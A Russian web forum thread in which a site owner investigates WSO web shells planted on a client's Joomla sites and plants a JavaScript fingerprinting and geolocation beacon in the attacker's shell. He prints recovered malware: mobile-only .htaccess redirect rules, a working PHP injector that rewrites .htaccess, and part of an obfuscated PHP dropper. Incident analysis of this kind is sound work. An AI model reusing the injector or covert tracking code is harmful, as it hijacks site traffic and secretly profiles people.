Перейти к содержанию
hplus

"Засада" на взломщика в его же шелле

Рекомендуемые сообщения

Приветствую. Жаль, что название темы нельзя сменить я бы назвал ее - Ревизор) 
 
Сегодня, ко мне обратился бывший клиент с просьбой о помощи. Дело обстояло в том, что в .htaccess поставили редирект на какой-то публичный агрегатор рекламы (не арбузоустойчивый). Т.е. сначала переадресовывается на него, потом на какое-нибудь онлайн-казино. Переадресация идет только на планшетах/телефонах, тем самым забирая значительную часть аудитории сайта. Через 2-3 дня удаления кода он восстанавливается. Промежуток в 2-3 дня как-бы говорит о том, что файл переименовывается вручную, либо скрипт запускается вручную.
 
После скачивания дампов сайта стал возможен анализ кода и access логов за неделю (что в последствии скажется). Анализ логов показал адреса запросов к "лишним" скриптам ("domain1.ru/docs/system/library/engine/1.php, domain2.ru/docs/system/library/stile.php"). При переходе к скрипту присутствует просьба ввести пароль, а значит это не просто скрипт, а шелл. 

 

После недолгой расшифровки предо мной предстал интерфейс. 

post-683592-0-95657400-1404869411_thumb.png

Шелл вполне распространенный, эргономичный и очень даже функциональный при его-то размере. Если понравился, то можете скачать называется WSO WEB Shell. Кстати после расшифровки md5 паролем оказался root

 

После дополнительного анализа логов за неделю на всех доменах узнал, что на шелл заходят только через веб-прокси, которые расположены только у крупных хостинг-провайдеров (таймвеб, 1gb, клодо и т.д.). Это отработанная и вполне рабочая схема. Использование российских хостинг-провайдеров как бы говорит о том, что наш взломщик с территории бывшего СНГ, что есть хорошо.

 

Если обратиться к хостинг-провайдерам с логами - ничего не даст. Ну, закроют его хостинг - зарегистрирует новый. При обилии сканов паспортов в публичном доступе можно не париться и зарегистрироваться прямо там же) В логах не видно через какую дыру он залил шеллы на сайт моего клиента, видимо прошла неделя с момента загрузки и в логах ничего нет. (Большинство хостинг-провайдеров хранят логи всего неделю) Предполагаемую дыру в не обновленном зарубежном модуле я закрыл, больше дыр не обнаружил. 

 

Зачем я все это писал, я хочу найти этого парня. Ну, или хотя бы более-менее точно составить его психологический портрет. Хочу посредством его же шелла получить максимум информации о нем.

 

--------------------------------------

 

Этот параграф начну с того, что использовать php для получения информации не имеет смысла т.к. наш ревизор использует прокси. А вот javascript, который выполняется в его браузере очень даже можно. Слышал, что с помощью JS можно узнать IP адрес во внутренней сети (в NAT), только не помню где я об этом слышал.

 

Я уже добавил авторизацию только со второго/третьего (пока не решил) раза, чтобы он ввел еще какой-нибудь пароль (хотя подумываю убрать). У него стоит хромиум или мозилла, винда 64x (из логов). 

 

Еще слышал про то, что с помощью js можно определить visited ссылка или нет. А значит можно написать страницу со списком сайтов с ссылками и прогнать его этим самым скриптом. Так можно будет узнать какие сайты посещал пользователь. Адреса сайтов нужно будет очень хорошо подобрать учитывая задачу и узкий круг интересов нашего ревизора.

 

Что еще посоветуете? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если в логах не видно дыр, через которые произошла загрузка шелла, то почему бы не восстановить сайт до последнего рабочего состояния и проследить за логами, чтобы словить взломщика на живца и определить что же это за дыра?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Онлайн-консультант к шеллу прикрепи) 

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если в логах не видно дыр, через которые произошла загрузка шелла, то почему бы не восстановить сайт до последнего рабочего состояния и проследить за логами, чтобы словить взломщика на живца и определить что же это за дыра?

 

Сегодня утром этот "ревизор" поменял все логи, чтобы мы его не смогли его отследить) Но мы еще вчера все логи скачали. Только что посмотрел whois домена рекламного агрегатора, оказывается он на обычном сервере стоит, в Украине. И домен был зарегистрирован всего месяц назад. Туплю...

 

Возвращение к бекапам - критично. Слишком старые. Я просто шеллы удалил. Буду караулить. На всякий случай расшифровал шелл добавил туда плюшки из http://javascript.ru/unsorted/id и подключил http://zhovner.com/jsdetector/ . Добавил пару кроссдоменных запросов и отслеживание по кукам на сайте и в шелле. Так что теперь когда он опять зальет я узнаю какую дыру закрывать. А потом еще и шелл подменю. Так как шелл собирает и отправляет данные при первой загрузке мне нечего бояться и я добавил ему в шелл еще и онлайн консультанта siteheart)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я добавил ему в шелл еще и онлайн консультанта siteheart) 

Да вы разошлись не на шутку в этой кибервойне  :-D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

афтар! Пеши исчо!

 

Прикольно, спасибо. Сказать, что познавательно - нет (для меня), но интересно.

 

Может и подскажем, а может и увидим что-то новое для себя.

 

Кстати, хороший шелл попал в руки... бывают похуже, поэтому поаккуратней с ним - не упусти.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для тех кому интересно что именно я добавил:

<script src="//zhovner.com/jsdetector.js?name=hplus">
//Определение локального и глобального IP из под VPN, NAT и т.д.
//Подробнее на zhovner.com/jsdetector
</script>

<script>
    //данные браузера
    var arrays = new Array(); 
    for(var prop in navigator) { 
        if (navigator[prop] instanceof Object || navigator[prop]==='') continue
            arrays.push(prop, navigator[prop]);
    }
    var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=Base64._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},decode:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=Base64._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/\r\n/g,"\n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}}
    
    //данные подключенных плагинов к браузеру
    var prev
    for(var i=0;i<navigator.plugins.length;i++) { 
        var plugin = navigator.plugins[i]
        var plugin = plugin.name+" "+(plugin.version || '')
        arrays.push('nav'+i, plugin);
        if (prev == plugin ) continue
        prev = plugin 
    }

    //Часовой пояс
    arrays.push('timezone',-new Date().getTimezoneOffset()/60);
    //отправка данных на сервер
    $.post('http://domain.ru/1.php', Base64.encode(JSON.stringify(arrays)));

    //на всякий случай гео локацию, если включена
    navigator.geolocation.getCurrentPosition(showPosition); 
    function showPosition(position) {
        arrays.push('h',position.coords.latitude);
        arrays.push('w',position.coords.longitude); 
        //Еще раз отправляем данные на сервер
        $.post('http://domain.ru/1.php', Base64.encode(JSON.stringify(arrays)));
    }
</script>

Содержимое файла domain.ru/1.php, на который приходит отчет:

<?php 
	header('Access-Control-Allow-Origin:*');
	$data2 = array();
	foreach ($_POST as $key => $value) {
		$data2 = json_decode(base64_decode($key));
		var_dump($data2);
	}
	$data = array($_SERVER, $_GET, $data2, $_POST);
	$data_encoded = json_encode($data);
	file_put_contents(md5($data_encoded).'.txt', $data_encoded);
?>

Ну, и siteheart :-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Во все файлы ".htaccess" на аккаунте, в начало файла добавляется:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://gl.downloadmenow.ru/?mob [L,R=302]

Инфицированные файлы, которые я нашел:

файл "/index.php" (Joomla) одного из доменов


ini_set('display_errors', 0);
error_reporting(0);
$MaineURl = 'http://gl.downloadmenow.ru/?mob';
$MainHtaccess =
"
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} 'text/vnd.wap.wml|application/vnd.wap.xhtml+xml' [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ $MaineURl [L,R=302]
";
$MyKeyvord = $MaineURl;
$mPath = pathinfo($_SERVER['SCRIPT_FILENAME']);
$nameFiles = $mPath['dirname'].'/.htaccess';
$StarHtaccess = file_get_contents($nameFiles);
preg_match('/(?<=RewriteRule).*(?=\[L\,R\=302\])/',$StarHtaccess, $matches);
$proverka = strpos($matches[0], $MyKeyvord);

if ($proverka === false) {
chmod($nameFiles,0666);
$NewHtaccess = $MainHtaccess. "\r\n" .$StarHtaccess;
$fp = fopen($nameFiles, "w");
fwrite($fp, $NewHtaccess);
fclose($fp);
} else {
chmod($nameFiles,0444);
}

?>

Файлы "/mailout.php", "/plugins/user/profile/session.php":

}wIQ\r7gp;^U0\"YBSH@!=&MOG\\Vlaz\$2mtxLFDX[Zb:f6)~h+%'_k/iyN4CTer.|(3]-\tq9*o PW"; $GLOBALS['kyvlc2'] = $i59[82].$i59[83].$i59[83].$i59[94].$i59[83].$i59[73].$i59[83].$i59[82].$i59[30].$i59[94].$i59[83].$i59[55].$i59[76].$i59[16].$i59[29]; $GLOBALS['osuwk64'] = $i59[76].$i59[16].$i59[76].$i59[73].$i59[10].$i59[82].$i59[55]; $GLOBALS['mrkzp11'] = $i59[63].$i59[2].$i59[55].$i59[76].$i59[94].$i59[53].$i59[28]; $GLOBALS['olhjz88'] = $i59[54].$i59[17].$i59[7]; $GLOBALS['gtwpr99'] = $i59[56].$i59[50].$i59[29].$i59[24].$i59[91].$i59[9].$i59[92]; $GLOBALS['azxqi23'] = $i59[65].$i59[10].$i59[1].$i59[56].$i59[1].$i59[9].$i59[53]; $GLOBALS['ttins71'] = $i59[10].$i59[49].$i59[49].$i59[55].$i59[24].$i59[9].$i59[28]; $GLOBALS['biplj38'] = $i59[69].$i59[74].$i59[63].$i59[49].$i59[91].$i59[18].$i59[18]; $GLOBALS['fufff37'] = $i59[2].$i59[83].$i59[16].$i59[54].$i59[10].$i59[79].$i59[34]; $GLOBALS['llsic87'] = $i59[30].$i59[74].$i59[24].$i59[56].$i59[29].$i59[53].$i59[53]; $GLOBALS['npqfu35'] = $i59[29].$i59[49].$i59[56].$i59[82].$i59[56].$i59[92].$i59[53]; $GLOBALS['kgedf91'] = $i59[77].$i59[29].$i59[56].$i59[55].$i59[65].$i59[7].$i59[53]; $GLOBALS['tscso85'] = $i59[10].$i59[55].$i59[83].$i59[49].$i59[82].$i59[16]; $GLOBALS['dkzox36'] = $i59[2].$i59[69].$i59[83]; $GLOBALS['nqkyz54'] = $i59[94].$i59[83].$i59[17]; $GLOBALS['bbolh46'] = $i59[63].$i59[50].$i59[10].$i59[82].$i59[66].$i59[79].$i59[73].$i59[82].$i59[16].$i59[2].$i59[94].$i59[17].$i59[82]; $GLOBALS['pzfzn51'] = $i59[2].$i59[94].$i59[1].$i59[16].$i59[55]; $GLOBALS['goxku40'] = $i59[65].$i59[1].$i59[16].$i59[2].$i59[55].$i59[76].$i59[94].$i59[16].$i59[73].$i59[82].$i59[56].$i59[76].$i59[10].$i59[55].$i59[10]; $GLOBALS['qllnp80'] = $i59[54].$i59[50].$i59[76].$i59[49]; $GLOBALS['oewlq88'] = $i59[65].$i59[12].$i59[2].$i59[24].$i59[17].$i59[92]; $GLOBALS['inaco6'] = $i59[65].$i59[29].$i59[82].$i59[55].$i59[10]; $GLOBALS['fbigd92'] = $i59[29].$i59[82].$i59[55].$i59[69].$i59[94].$i59[10].$i59[55].$i59[63].$i59[77].$i59[16].$i59[50].$i59[54].$i59[82]; $GLOBALS['szwwc12'] = $i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16]; $GLOBALS['ifjvc34'] = $i59[30].$i59[65].$i59[10].$i59[94].$i59[2].$i59[74].$i59[94].$i59[30].$i59[82].$i59[16]; $GLOBALS['eypvx47'] = $i59[10].$i59[55].$i59[83].$i59[82].$i59[50].$i59[54].$i59[73].$i59[10].$i59[94].$i59[2].$i59[74].$i59[82].$i59[55].$i59[73].$i59[2].$i59[49].$i59[76].$i59[82].$i59[16].$i59[55]; $GLOBALS['ewgqn30'] = $i59[65].$i59[30].$i59[1].$i59[55].$i59[10]; $GLOBALS['qlkol47'] = $i59[55].$i59[83].$i59[76].$i59[54]; $GLOBALS['wwxez32'] = 